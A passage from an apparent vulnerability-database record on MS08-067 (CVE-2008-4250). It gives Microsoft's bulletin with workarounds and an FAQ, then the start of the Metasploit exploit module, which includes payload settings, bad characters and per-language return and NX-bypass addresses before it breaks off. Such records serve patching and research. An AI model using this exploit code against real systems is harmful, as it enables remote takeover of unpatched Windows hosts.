1\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for 32-bit Systems*\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for x64-based Systems*\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for Itanium-based Systems\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\n*Windows Server 2008 server core installation affected. For supported editions of Windows Server 2008, this update applies, with the same severity rating, whether or not Windows Server 2008 was installed using the Server Core installation option. For more information on this installation option, see Server Core. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008; see Compare Server Core Installation Options.\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nWhere are the file information details? \r\nThe file information details can be found in Microsoft Knowledge Base Article 958644.\r\n\r\nIs the Windows 7 Pre-Beta release affected by this vulnerability?\r\nYes. This vulnerability was reported after the release of Windows 7 Pre-Beta. Customers running Windows 7 Pre-Beta are encouraged to download and apply the update to their systems. On Windows 7 Pre-Beta systems, the vulnerable code path is only accessible to authenticated users. This vulnerability is not liable to be triggered if the attacker is not authenticated, and therefore would be rated Important.\r\n\r\nSecurity updates are available from Microsoft Update, Windows Update, and Office Update. Security updates are also available from the Microsoft Download Center. You can find them most easily by doing a keyword search for "security update."\r\n\r\nI am using an older release of the software discussed in this security bulletin. What should I do? \r\nThe affected software listed in this bulletin have been tested to determine which releases are affected. Other releases are past their support life cycle. To determine the support life cycle for your software release, visit Microsoft Support Lifecycle.\r\n\r\nIt should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit Microsoft Support Lifecycle. For more information about the extended security update support period for these software versions or editions, visit Microsoft Product Support Services.\r\n\r\nCustomers who require custom support for older releases must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit Microsoft Worldwide Information, select the country, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\nTop of sectionTop of section\r\nVulnerability Information\r\n\t\r\nSeverity Ratings and Vulnerability Identifiers\r\nVulnerability Severity Rating and Maximum Security Impact by Affected Software\r\nAffected Software\tServer Service Vulnerability - CVE-2008-4250\tAggregate Severity Rating\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows XP Service Pack 2 and Windows XP Service Pack 3\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2003 x64 Edition and Windows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2003 with SP1 for Itanium-based Systems and Windows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nCritical\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Vista and Windows Vista Service Pack 1\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nWindows Vista x64 Edition and Windows Vista x64 Edition Service Pack 1\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nWindows Server 2008 for 32-bit Systems*\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nWindows Server 2008 for x64-based Systems*\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nWindows Server 2008 for Itanium-based Systems\r\n\t\r\n\r\nImportant\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\n*Windows Server 2008 server core installation affected. For supported editions of Windows Server 2008, this update applies, with the same severity rating, whether or not Windows Server 2008 was installed using the Server Core installation option. For more information on this installation option, see Server Core. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008; see Compare Server Core Installation Options.\r\nTop of sectionTop of section\r\n\t\r\nServer Service Vulnerability - CVE-2008-4250\r\n\r\nA remote code execution vulnerability exists in the Server service on Windows systems. The vulnerability is due to the service not properly handling specially crafted RPC requests. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2008-4250.\r\n\t\r\nMitigating Factors for Server Service Vulnerability - CVE-2008-4250\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nFirewall best practices and standard default firewall configurations can help protect network resources from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.\r\n\u2022\t\r\n\r\nOn Windows Vista and Windows Server 2008, the vulnerable code path is only accessible to authenticated users. This vulnerability is not liable to be triggered if the attacker is not authenticated.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Server Service Vulnerability - CVE-2008-4250\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nDisable the Server and Computer Browser services\r\n\r\nDisabling the Computer Browser and Server service on the affected systems will help protect systems from remote attempts to exploit this vulnerability.\r\n\r\nYou can disable these services by using the following steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, and then click Control Panel (or point to Settings and then click Control Panel).\r\n\r\n2.\r\n\t\r\n\r\nDouble-click Administrative Tools.\r\n\r\n3.\r\n\t\r\n\r\nDouble-click Services.\r\n\r\n4.\r\n\t\r\n\r\nDouble-click Computer Browser Service.\r\n\r\n5.\r\n\t\r\n\r\nIn the Startup type list, click Disabled.\r\n\r\n6.\r\n\t\r\n\r\nClick Stop, and then click OK.\r\n\r\n7.\r\n\t\r\n\r\nRepeat steps 4-6 for the Server service\r\n\r\nImpact of Workaround. If the Computer Browser service is disabled, any services that explicitly depend on the Computer Browser service may log an error message in the system event log. For more information about the Computer Browser service, see Microsoft Knowledge Base Article 188001. If the Server service is disabled, you will not be able to share files or printers from your computer. However, you will still be able to view and use file shares and printer resources on other systems.\r\n\r\nHow to undo the workaround. You can enable these services by using the following steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, and then click Control Panel (or point to Settings, and then click Control Panel).\r\n\r\n2.\r\n\t\r\n\r\nDouble-click Administrative Tools.\r\n\r\n3.\r\n\t\r\n\r\nDouble-click Services.\r\n\r\n4.\r\n\t\r\n\r\nDouble-click Computer Browser Service.\r\n\r\n5.\r\n\t\r\n\r\nIn the Startup type list, click Automatic.\r\n\r\n6.\r\n\t\r\n\r\nClick Start, and then click OK.\r\n\r\n7.\r\n\t\r\n\r\nRepeat steps 4-6 for the Server service\r\n\u2022\t\r\n\r\nOn Windows Vista and Windows Server 2008, filter the affected RPC identifier\r\n\r\nIn addition to blocking ports with the Windows Firewall, the Windows Vista and Windows Server 2008 editions can selectively filter RPC Universally Unique Identifiers (UUID). To prevent this vulnerability, add a rule that blocks all RPC requests with the UUID equal to 4b324fc8-1670-01d3-1278-5a47bf6ee188. This is accomplished through the network shell. To access the network shell, run the following command from an elevated command prompt:\r\n\r\nnetsh\r\n\r\nOnce in the netsh environment, enter the following commands:\r\n\r\nnetsh>rpc\r\nnetsh rpc>filter\r\nnetsh rpc filter>add rule layer=um actiontype=block\r\nnetsh rpc filter>add condition field=if_uuid matchtype=equal data=4b324fc8-1670-01d3-1278-5a47bf6ee188\r\nnetsh rpc filter>add filter\r\nnetsh rpc filter>quit\r\n\r\nThe Filter Key is a randomly generated UUID specific to each system. To confirm the filter is in place, run the following command from an elevated command prompt:\r\n\r\nnetsh rpc filter show filter\r\n\r\nIf the commands are successful, the system displays the following information:\r\n\r\nListing all RPC Filters.\r\n---------------------------------\r\nfilterKey: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\r\ndisplayData.name: RPCFilter\r\ndisplayData.description: RPC Filter\r\nfilterId: 0x12f79\r\nlayerKey: um\r\nweight: Type: FWP_EMPTY Value: Empty\r\naction.type: block\r\nnumFilterConditions: 1\r\n\r\nWhere filterKey: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx equates to the randomly generated UUID relevant to your system.\r\n\r\nImpact of workaround. Certain applications that rely on the Microsoft Server Message Block (SMB) Protocol may not function as intended. However, you will still be able to view and use file shares and printer resources on other systems.\r\n\r\nHow to undo the workaround. Run the following command from an elevated command prompt:\r\n\r\nnetsh rpc filter delete filter xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\r\n\r\nWhere filterKey: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx equates to the randomly generated UUID relevant to your system.\r\n\u2022\t\r\n\r\nBlock TCP ports 139 and 445 at the firewall\r\n\r\nThese ports are used to initiate a connection with the affected component. Blocking TCP ports 139 and 445 at the firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. Microsoft recommends that you block all unsolicited inbound communication from the Internet to help prevent attacks that may use other ports. For more information about ports, see TCP and UDP Port Assignments.\r\n\r\nImpact of workaround. Several Windows services use the affected ports. Blocking connectivity to the ports may cause various applications or services to not function. Some of the applications or services that could be impacted are listed below:\r\n\u2022\t\r\n\r\nApplications that use SMB (CIFS)\r\n\u2022\t\r\n\r\nApplications that use mailslots or named pipes (RPC over SMB)\r\n\u2022\t\r\n\r\nServer (File and Print Sharing)\r\n\u2022\t\r\n\r\nGroup Policy\r\n\u2022\t\r\n\r\nNet Logon\r\n\u2022\t\r\n\r\nDistributed File System (DFS)\r\n\u2022\t\r\n\r\nTerminal Server Licensing\r\n\u2022\t\r\n\r\nPrint Spooler\r\n\u2022\t\r\n\r\nComputer Browser\r\n\u2022\t\r\n\r\nRemote Procedure Call Locator\r\n\u2022\t\r\n\r\nFax Service\r\n\u2022\t\r\n\r\nIndexing Service\r\n\u2022\t\r\n\r\nPerformance Logs and Alerts\r\n\u2022\t\r\n\r\nSystems Management Server\r\n\u2022\t\r\n\r\nLicense Logging Service\r\n\u2022\t\r\n\r\nTo help protect from network-based attempts to exploit this vulnerability, use a personal firewall, such as the Internet Connection Firewall\r\n\r\nAll supported editions of Windows Vista come with Windows Firewall, a two-way firewall that is automatically enabled.\r\n\r\nFor all supported editions of Windows XP and Windows Server 2003, use the Internet Connection Firewall feature to help protect your Internet connection by blocking unsolicited incoming traffic. Microsoft recommends that you block all unsolicited incoming communication from the Internet. In Windows XP Service Pack 2 and Windows XP Service Pack 3, this feature is called the Windows Firewall.\r\n\r\nBy default, the Windows Firewall feature in Windows XP helps protect your Internet connection by blocking unsolicited incoming traffic. We recommend that you block all unsolicited incoming communication from the Internet.\r\n\r\nTo enable the Windows Firewall feature by using the Network Setup Wizard, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, and then click Control Panel.\r\n\r\n2.\r\n\t\r\n\r\nDouble-click Network Connections and then click Change Windows Firewall Settings.\r\n\r\n3.\r\n\t\r\n\r\nOn the General tab, ensure that the On (recommended) value is selected. This will enable the Windows Firewall.\r\n\r\n4.\r\n\t\r\n\r\nOnce the Windows Firewall is enabled, select Don\u2019t allow exceptions to prohibit all incoming traffic.\r\n\r\nFor Windows Server 2003 systems, configure Internet Connection Firewall manually for a connection using the following steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, and then click Control Panel.\r\n\r\n2.\r\n\t\r\n\r\nIn the default Category View, click Networking and Internet Connections, and then click Network Connections.\r\n\r\n3.\r\n\t\r\n\r\nRight-click the connection on which you want to enable Internet Connection Firewall, and then click Properties.\r\n\r\n4.\r\n\t\r\n\r\nClick the Advanced tab.\r\n\r\n5.\r\n\t\r\n\r\nClick to select the Protect my computer or network by limiting or preventing access to this computer from the Internet check box, and then click OK.\r\n\r\nNote If you want to enable certain programs and services to communicate through the firewall, click Settings on the Advanced tab, and then select the programs, the protocols, and the services that are required.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Server Service Vulnerability - CVE-2008-4250\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system remotely. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability over RPC without authentication to run arbitrary code. It is possible that this vulnerability could be used in the crafting of a wormable exploit. If successfully exploited, an attacker could then install programs or view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability? \r\nThe vulnerability is caused by the Windows Server service not properly handling specially crafted RPC requests.\r\n\r\nWhat is the Server service? \r\nThe Server service provides RPC support, file and print support, and named pipe sharing over the network. The Server service allows the sharing of your local resources (such as disks and printers) so that other users on the network can access them. It also allows named pipe communication between applications running on other computers and your computer, which is used for RPC.\r\n\r\nWhat is RPC? \r\nRemote Procedure Call (RPC) is a protocol that a program can use to request a service from a program located on another computer in a network. RPC helps with interoperability because the program using RPC does not have to understand the network protocols that are supporting communication. In RPC, the requesting program is the client and the service-providing program is the server.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could try to exploit the vulnerability by sending a specially crafted message to an affected system. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, any anonymous user with access to the target network could deliver a specially crafted network packet to the affected system in order to exploit this vulnerability. On Windows Vista and Windows Server 2008 systems, however, only an authenticated user with access to the target network could deliver a specially crafted network packet to the affected system in order to exploit this vulnerability.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nWhile all workstations and servers are at risk regarding this issue, systems running Microsoft Windows 2000, Windows XP, or Windows Server 2003 are primarily at risk due to the unique characteristics of the vulnerability and affected code path.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by correcting the manner in which the Server service handles RPC requests.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nYes. Microsoft is aware of limited, targeted attacks attempting to exploit the vulnerability. However, when the security bulletin was released, Microsoft had not seen any examples of proof of concept code published.\r\n\r\nDoes applying this security update help protect customers from the code that attempts to exploit this vulnerability? \r\nYes. This security update addresses the vulnerability that is currently being exploited. The vulnerability that has been addressed has been assigned the Common Vulnerability and Exposure number CVE-2008-4250.\r\n\r\nOther Information\r\nSupport\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Microsoft Product Support Services at 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nDisclaimer\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions\r\n\u2022\t\r\n\r\nV1.0 (October 23, 2008): Bulletin published.", "modified": "2008-10-24T00:00:00", "published": "2008-10-24T00:00:00", "id": "SECURITYVULNS:DOC:20745", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20745", "title": "Microsoft Security Bulletin MS08-067 \u2013 Critical Vulnerability in Server Service Could Allow Remote Code Execution (958644)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-11-29T11:18:50", "bulletinFamily": "exploit", "description": "This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.\n", "modified": "2017-07-24T13:26:21", "published": "2012-06-19T17:59:15", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS08_067_NETAPI", "href": "", "type": "metasploit", "title": "MS08-067 Microsoft Server Service Relative Path Stack Corruption", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS08-067 Microsoft Server Service Relative Path Stack Corruption',\n 'Description' => %q{\n This module exploits a parsing flaw in the path canonicalization code of\n NetAPI32.dll through the Server Service. This module is capable of bypassing\n NX on some operating systems and service packs. The correct target must be\n used to prevent the Server Service (along with a dozen others in the same\n process) from crashing. Windows XP targets seem to handle multiple successful\n exploitation events, but 2003 targets will often crash or hang on subsequent\n attempts. This is just the first version of this module, full support for\n NX bypass on 2003, along with other platforms, is still in development.\n },\n 'Author' =>\n [\n 'hdm', # with tons of input/help/testing from the community\n 'Brett Moore <brett.moore[at]insomniasec.com>',\n 'frank2 <frank2[at]dc949.org>', # check() detection\n 'jduck', # XP SP2/SP3 AlwaysOn DEP bypass\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n %w(CVE 2008-4250),\n %w(OSVDB 49243),\n %w(MSB MS08-067),\n # If this vulnerability is found, ms08-67 is exposed as well\n ['URL', 'http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 408,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\\x40\",\n 'Prepend' => \"\\x81\\xE4\\xF0\\xFF\\xFF\\xFF\", # stack alignment\n 'StackAdjustment' => -3500,\n\n },\n 'Platform' => 'win',\n 'DefaultTarget' => 0,\n 'Targets' =>\n [\n #\n # Automatic targetting via fingerprinting\n #\n ['Automatic Targeting', { 'auto' => true }],\n\n #\n # UNIVERSAL TARGETS\n #\n\n #\n # Antoine's universal for Windows 2000\n # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET\n #\n ['Windows 2000 Universal',\n {\n 'Ret' => 0x001f1cb0,\n 'Scratch' => 0x00020408,\n }\n ], # JMP EDI SVCHOST.EXE\n\n #\n # Standard return-to-ESI without NX bypass\n # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET\n #\n ['Windows XP SP0/SP1 Universal',\n {\n 'Ret' => 0x01001361,\n 'Scratch' => 0x00020408,\n }\n ], # JMP ESI SVCHOST.EXE\n\n # Standard return-to-ESI without NX bypass\n ['Windows 2003 SP0 Universal',\n {\n 'Ret' => 0x0100129e,\n 'Scratch' => 0x00020408,\n }\n ], # JMP ESI SVCHOST.EXE\n\n #\n # ENGLISH TARGETS\n #\n\n # jduck's AlwaysOn NX Bypass for XP SP2\n ['Windows XP SP2 English (AlwaysOn NX)',\n {\n # No pivot is needed, we drop into our rop\n 'Scratch' => 0x00020408,\n 'UseROP' => '5.1.2600.2180'\n }\n ],\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 English (NX)',\n {\n 'Ret' => 0x6f88f727,\n 'DisableNX' => 0x6f8916e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # jduck's AlwaysOn NX Bypass for XP SP3\n ['Windows XP SP3 English (AlwaysOn NX)',\n {\n # No pivot is needed, we drop into our rop\n 'Scratch' => 0x00020408,\n 'UseROP' => '5.1.2600.5512'\n }\n ],\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 English (NX)',\n {\n 'Ret' => 0x6f88f807,\n 'DisableNX' => 0x6f8917c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n #\n # NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED\n #\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Arabic (NX)',\n {\n 'Ret' => 0x6fd8f727,\n 'DisableNX' => 0x6fd916e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Chinese - Traditional / Taiwan (NX)',\n {\n 'Ret' => 0x5860f727,\n 'DisableNX' => 0x586116e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Chinese - Simplified (NX)',\n {\n 'Ret' => 0x58fbf727,\n 'DisableNX' => 0x58fc16e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Chinese - Traditional (NX)',\n {\n 'Ret' => 0x5860f727,\n 'DisableNX' => 0x586116e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Czech (NX)',\n {\n 'Ret' => 0x6fe1f727,\n 'DisableNX' => 0x6fe216e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Danish (NX)',\n {\n 'Ret' => 0x5978f727,\n 'DisableNX' => 0x597916e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 German (NX)',\n {\n 'Ret' => 0x6fd9f727,\n 'DisableNX' => 0x6fda16e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Greek (NX)',\n {\n 'Ret' => 0x592af727,\n 'DisableNX' => 0x592b16e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Spanish (NX)',\n {\n 'Ret' => 0x6fdbf727,\n 'DisableNX' => 0x6fdc16e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Finnish (NX)',\n {\n 'Ret' => 0x597df727,\n 'DisableNX' => 0x597e16e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 French (NX)',\n {\n 'Ret' => 0x595bf727,\n 'DisableNX' => 0x595c16e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Hebrew (NX)',\n {\n 'Ret' => 0x5940f727,\n 'DisableNX' => 0x594116e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Hungarian (NX)',\n {\n 'Ret' => 0x5970f727,\n 'DisableNX' => 0x597116e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Italian (NX)',\n {\n 'Ret' => 0x596bf727,\n 'DisableNX' => 0x596c16e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Japanese (NX)',\n {\n 'Ret' => 0x567fd3be,\n 'DisableNX' => 0x568016e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Korean (NX)',\n {\n 'Ret' => 0x6fd6f727,\n 'DisableNX' => 0x6fd716e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Dutch (NX)',\n {\n 'Ret' => 0x596cf727,\n 'DisableNX' => 0x596d16e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Norwegian (NX)',\n {\n 'Ret' => 0x597cf727,\n 'DisableNX' => 0x597d16e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Polish (NX)',\n {\n 'Ret' => 0x5941f727,\n 'DisableNX' => 0x594216e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Portuguese - Brazilian (NX)',\n {\n 'Ret' => 0x596ff727,\n 'DisableNX' => 0x597016e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Portuguese (NX)',\n {\n 'Ret' => 0x596bf727,\n 'DisableNX' => 0x596c16e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Russian (NX)',\n {\n 'Ret' => 0x6fe1f727,\n 'DisableNX' => 0x6fe216e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Swedish (NX)',\n {\n 'Ret' => 0x597af727,\n 'DisableNX' => 0x597b16e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Turkish (NX)',\n {\n 'Ret' => 0x5a78f727,\n 'DisableNX' => 0x5a7916e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Arabic (NX)',\n {\n 'Ret' => 0x6fd8f807,\n 'DisableNX' => 0x6fd917c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Chinese - Traditional / Taiwan (NX)',\n {\n 'Ret' => 0x5860f807,\n 'DisableNX' => 0x586117c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Chinese - Simplified (NX)',\n {\n 'Ret' => 0x58fbf807,\n 'DisableNX' => 0x58fc17c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Chinese - Traditional (NX)',\n {\n 'Ret' => 0x5860f807,\n 'DisableNX' => 0x586117c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Czech (NX)',\n {\n 'Ret' => 